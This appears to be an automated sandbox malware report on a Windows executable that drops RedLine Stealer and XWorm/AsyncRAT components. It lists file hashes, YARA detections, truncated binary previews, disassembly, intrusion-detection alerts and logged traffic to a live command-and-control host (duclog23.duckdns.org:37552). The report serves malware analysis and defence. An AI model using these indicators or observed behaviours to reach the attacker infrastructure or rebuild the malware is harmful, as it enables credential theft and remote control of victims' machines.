                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\AppData\Roaming\Metin.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 52736
Entropy (8bit): 5.903993484109811
Encrypted: false
SSDEEP: 768:FLdZOZzmUfksaHE1A/8VgrtADehQhueHa25b/8yp7XTA6xUOZthphknP:Fx4zxIk56rWqHQb/8yJDA6xUOrEP
MD5: 1D846637AA409D6DD4FD14F70A63F907
SHA1: A0F494B321EF5BD5B95F60D4EE9E4AE836D73B8A
SHA-256: 08A5AB51F8EEE96D3837AAEF4D74BF672D937056118003ECFA0E4DF9DAE49125
SHA-512: 259BD4D63BD69CDFD9A29303DC5EF3174136353DAAD23747C4589ED5B760D9905285211850BF49FDE37C0BA355F3E463DF6633A518AFFB270CFEB9F24885508C
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
Joe Sandbox View:
• Filename: P7UN3WhDhK.exe, Detection: malicious, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.f................................. ........@.. .......................@............@.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H........]..........&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. ..&.*.s.........s.........s.........s.........*.r1..p*. ...*.rI..p*. ....*.ra..p*. .x!.*.ry..p*. ....*.r...p*. .\=.*..((...*.r...p*. ~..*.r...p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*.r...p*. ~.H.*.r...p*.r...p*. ..'.*.r#..p*. ....*.r;..p*. ..J.*.rS..p*.rk..p*. m.`.*.r...p

Process: C:\Users\user\Desktop\f5ATZ1i5CU.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 97792
Entropy (8bit): 5.960657075530222
Encrypted: false
SSDEEP: 1536:Nqsuoqu3lbG6jejoigIH43Ywzi0Zb78ivombfexv0ujXyyed2ptmulgS6pIl:771FYH+zi0ZbYe1g0ujyzdpI
MD5: 2598B5FEE38D9C0979F009E77F94EA33
SHA1: 9C2C0F0734FBF16853DE911868024DFBED91E5EC
SHA-256: 00A709BACA231F15267526D7B5DB11CD94B0089ED6CFD1667A1FF2EBD584C266
SHA-512: D6FA07FDFA6493C3ABE95C650DCA114B1737D8812FE86476EF8AFBB1D34E50B537821A7958ACDC243246484FC4F28DD208DB4328663BBC22EC79AE34F3340C8E
Malicious: true
Yara Hits:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: unknown
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 89%
Joe Sandbox View:
• Filename: P7UN3WhDhK.exe, Detection: malicious, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@....................................K.................................................................................... ............... ..H............text...Ds... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................ .......H...........<.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

Process: C:\Users\user\Desktop\f5ATZ1i5CU.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 52736
Entropy (8bit): 5.903993484109811
Encrypted: false
SSDEEP: 768:FLdZOZzmUfksaHE1A/8VgrtADehQhueHa25b/8yp7XTA6xUOZthphknP:Fx4zxIk56rWqHQb/8yJDA6xUOrEP
MD5: 1D846637AA409D6DD4FD14F70A63F907
SHA1: A0F494B321EF5BD5B95F60D4EE9E4AE836D73B8A
SHA-256: 08A5AB51F8EEE96D3837AAEF4D74BF672D937056118003ECFA0E4DF9DAE49125
SHA-512: 259BD4D63BD69CDFD9A29303DC5EF3174136353DAAD23747C4589ED5B760D9905285211850BF49FDE37C0BA355F3E463DF6633A518AFFB270CFEB9F24885508C
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 96%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{.f................................. ........@.. .......................@............@.................................8...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................p.......H........]..........&.....................................................(....*.r...p*. ..e.*..(....*.r...p*. ..&.*.s.........s.........s.........s.........*.r1..p*. ...*.rI..p*. ....*.ra..p*. .x!.*.ry..p*. ....*.r...p*. .\=.*..((...*.r...p*. ~..*.r...p*. ...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*.r...p*. ~.H.*.r...p*.r...p*. ..'.*.r#..p*. ....*.r;..p*. ..J.*.rS..p*.rk..p*. m.`.*.r...p

Process: C:\Users\user\AppData\Roaming\Metin.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 9 09:06:04 2024, mtime=Mon Dec 9 09:06:04 2024, atime=Mon Dec 9 09:06:04 2024, length=52736, window=hide
Category: modified
Size (bytes): 758
Entropy (8bit): 5.043342147845556
Encrypted: false
SSDEEP: 12:8ng4IZ+OSYChtlZY//16GfLA/MKfLsLL+jAXNHCu1LZzcfxcfPmV:8RIZ+sWSd684js/CA5R9c2nm
MD5: DFC321771449C4ABBFCCF7099940552E
SHA1: 686AC4D300B5714F7BDA48BB5FFABBCF71E06E27
SHA-256: E22AC0179DB6BFBAEAE2AF949F0011B4F2DD7B4EB16D018B447EDA9C537460AB
SHA-512: 994659296832C33A4D5BB5D97D999F2EC680C9763A72A02A90688D132953E1D7C6B5D8D1D7009EED9A7D5C6CF327577D22FA053C49D8564ABBFF012819951473
Malicious: false
Preview: L..................F.... .....J.!J....J.!J....J.!J..........................t.:..DG..Yr?.D..U..k0.&...&.........5q...;...!J......!J......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.P...........................c..A.p.p.D.a.t.a...B.V.1......Y.P..Roaming.@......EW)N.Y.P..........................Pi..R.o.a.m.i.n.g.....`.2......Y.P .Chrome.exe..F......Y.P.Y.P...._.........................C.h.r.o.m.e...e.x.e.......W...............-.......V.............#......C:\Users\user\AppData\Roaming\Chrome.exe........\.....\.....\.....\.....\.C.h.r.o.m.e...e.x.e.`.......X.......928100...........hT..CrF.f4... .*........+...E...hT..CrF.f4... .*........+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.104771157989001
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: f5ATZ1i5CU.exe
File size: 261'120 bytes
MD5: 854a42e9a581b2a33ceda0f3d3dd2f04
SHA1: a100a400e570039823c4fd79dc470c13ccfbb266
SHA256: fae4297f765a1c93fef48d7bddd8c88e6361dcb7eb9efc7cb10ff050e2157d80
SHA512: 569dc63dc90b1a6efebb9130d2dce133d3600937a1a6440575037b2b8d36b6aff8c607b86ba2ff0192324ed9cbae519e8a4aa3d9dd6e4b3b6f9d8483e043e1c0
SSDEEP: 3072:y1hoF2jJ6wiPa1XzwIxJLp7tUE1NgBS5Bs//dm63NzzEfHs/FtMtO2NcSINUc9nR:y1hnJ6D1IxPtUyNrsHdmqEfETrSc9nCu
TLSH: EF448B4DA718CA11E2FE1F72E9738DC235E82E6EACC15AC026E7F6541BB25430B704B4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................p....@.......................... .............................................
Icon Hash: 66dba9565ca99a4e
Entrypoint: 0x4014d1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: a9c887a4f18a3fede2cc29ceea138ed3

Instruction
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007FA3E8B7330Dh
add esp, 0Ch
mov eax, 004014AFh
push eax
call 00007FA3E8B73347h
mov eax, 00000001h
push eax
call 00007FA3E8B73344h
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007FA3E8B73338h
add esp, 08h
mov eax, dword ptr [00426E24h]
mov ecx, dword ptr [00426E28h]
mov edx, dword ptr [00426E2Ch]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [00427000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007FA3E8B73312h
add esp, 14h
mov eax, dword ptr [00426E24h]
mov ecx, dword ptr [00426E28h]
mov edx, dword ptr [00426E2Ch]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B730ECh
                                                                                                                  add esp, 0Ch
                                                                                                                  push eax
                                                                                                                  call 00007FA3E8B732E8h
                                                                                                                  add esp, 04h
                                                                                                                  leave
                                                                                                                  ret
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 00000004h
                                                                                                                  nop
                                                                                                                  mov eax, dword ptr [00426E24h]
                                                                                                                  mov ecx, dword ptr [ebp+08h]
                                                                                                                  mov dword ptr [eax], ecx
                                                                                                                  mov eax, dword ptr [00000000h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26db0 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28000 | 0x19e1c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x26e00 | 0x58 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x668 | 0x800 | 24a124dd2e4f1717de0fe655f139010d | False | 0.40673828125 | data | 4.602726461688375 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x2000 | 0x24fb3 | 0x25000 | 6b1a58764e2b373cfb124e0122ce55be | False | 0.7479478990709459 | data | 7.144663458144612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .bss | 0x27000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x28000 | 0x19e1c | 0x1a000 | c600d9c76ddfc7336d35c84936556111 | False | 0.5116624098557693 | data | 6.008443448480672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x28144 | 0xb170 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9995817189151109 |
| RT_ICON | 0x332b4 | 0xe8a8 | Device independent bitmap graphic, 120 x 240 x 32, image size 57600, resolution 2835 x 2835 px/m | English | United States | 0.13287441235728678 |
| RT_GROUP_ICON | 0x41b5c | 0x14 | data | English | United States | 1.15 |
| RT_GROUP_ICON | 0x41b70 | 0x14 | data | | | 0.95 |
| RT_MANIFEST | 0x41b84 | 0x296 | XML 1.0 document, ASCII text | English | United States | 0.4607250755287009 |
| DLL | Import |
|---|---|
| msvcrt.dll | malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit |
| shell32.dll | ShellExecuteA |
| kernel32.dll | SetUnhandledExceptionFilter |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-09T11:05:00.561202+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49704 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:05:16.188278+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49740 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:05:31.798637+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49777 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:05:47.256001+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49813 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:06:02.699270+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49849 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:06:18.133356+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49885 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:06:33.645441+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49923 | 192.169.69.26 | 37552 | TCP |
| 2024-12-09T11:06:49.183070+0100 | 2849662 | ETPRO MALWARE RedLine - CheckConnect Request | 1 | 192.168.2.10 | 49960 | 192.169.69.26 | 37552 | TCP |
                                                                                                                  Dec 9, 2024 11:06:42.915112972 CET700049944192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:42.915221930 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.844080925 CET499447000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.846395016 CET499737000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.964879036 CET700049944192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:43.966483116 CET700049973192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:43.966713905 CET499737000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:43.983134031 CET499737000192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:44.102749109 CET700049973192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:49.182894945 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:49.183069944 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:49.183183908 CET4996037552192.168.2.10192.169.69.26
                                                                                                                  Dec 9, 2024 11:06:49.302666903 CET3755249960192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:54.234297991 CET700049973192.169.69.26192.168.2.10
                                                                                                                  Dec 9, 2024 11:06:54.237549067 CET499737000192.168.2.10192.169.69.26
Timestamp                            Source Port   Dest Port   Source IP       Dest IP
Dec 9, 2024 11:04:49.615761042 CET   64504         53          192.168.2.10    1.1.1.1
Dec 9, 2024 11:04:49.955157995 CET   53            64504       1.1.1.1         192.168.2.10
Dec 9, 2024 11:04:54.112054110 CET   62737         53          192.168.2.10    1.1.1.1
Dec 9, 2024 11:04:54.251852036 CET   53            62737       1.1.1.1         192.168.2.10
Dec 9, 2024 11:06:06.664273977 CET   62794         53          192.168.2.10    1.1.1.1
Dec 9, 2024 11:06:07.000431061 CET   53            62794       1.1.1.1         192.168.2.10
Timestamp                            Source IP      Dest IP   Trans ID   OP Code              Name                   Type             Class         DNS over HTTPS
Dec 9, 2024 11:04:49.615761042 CET   192.168.2.10   1.1.1.1   0x7c51     Standard query (0)   duclog23.duckdns.org   A (IP address)   IN (0x0001)   false
Dec 9, 2024 11:04:54.112054110 CET   192.168.2.10   1.1.1.1   0x76bc     Standard query (0)   ip-api.com             A (IP address)   IN (0x0001)   false
Dec 9, 2024 11:06:06.664273977 CET   192.168.2.10   1.1.1.1   0xbe17     Standard query (0)   duclog23.duckdns.org   A (IP address)   IN (0x0001)   false
Timestamp                            Source IP   Dest IP        Trans ID   Reply Code     Name                           CName   Address           Type             Class         DNS over HTTPS
Dec 9, 2024 11:04:49.955157995 CET   1.1.1.1     192.168.2.10   0x7c51     No error (0)   duclog23.duckdns.org           -       192.169.69.26     A (IP address)   IN (0x0001)   false
Dec 9, 2024 11:04:54.251852036 CET   1.1.1.1     192.168.2.10   0x76bc     No error (0)   ip-api.com                     -       208.95.112.1      A (IP address)   IN (0x0001)   false
Dec 9, 2024 11:05:20.498800993 CET   1.1.1.1     192.168.2.10   0x4cc4     No error (0)   bg.microsoft.map.fastly.net    -       199.232.214.172   A (IP address)   IN (0x0001)   false
Dec 9, 2024 11:05:20.498800993 CET   1.1.1.1     192.168.2.10   0x4cc4     No error (0)   bg.microsoft.map.fastly.net    -       199.232.210.172   A (IP address)   IN (0x0001)   false
Dec 9, 2024 11:06:07.000431061 CET   1.1.1.1     192.168.2.10   0xbe17     No error (0)   duclog23.duckdns.org           -       192.169.69.26     A (IP address)   IN (0x0001)   false
                                                                                                                  • duclog23.duckdns.org:37552
                                                                                                                  • ip-api.com
Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
0            192.168.2.10   49704         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:04:50.178194046 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
1            192.168.2.10   49711         208.95.112.1     80                 7184   C:\Users\user\AppData\Roaming\Metin.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:04:54.396163940 CET   80                  OUT         GET /line/?fields=hosting HTTP/1.1
                                                                     Host: ip-api.com
                                                                     Connection: Keep-Alive
Dec 9, 2024 11:04:55.549808979 CET   175                 IN          HTTP/1.1 200 OK
                                                                     Date: Mon, 09 Dec 2024 10:04:54 GMT
                                                                     Content-Type: text/plain; charset=utf-8
                                                                     Content-Length: 6
                                                                     Access-Control-Allow-Origin: *
                                                                     X-Ttl: 60
                                                                     X-Rl: 44
                                                                     Data Raw: 66 61 6c 73 65 0a
                                                                     Data Ascii: false


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
2            192.168.2.10   49740         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:05:05.793296099 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
3            192.168.2.10   49777         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:05:21.358750105 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
4            192.168.2.10   49813         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:05:36.934004068 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
5            192.168.2.10   49849         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:05:52.386322021 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
6            192.168.2.10   49885         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:06:07.825258970 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
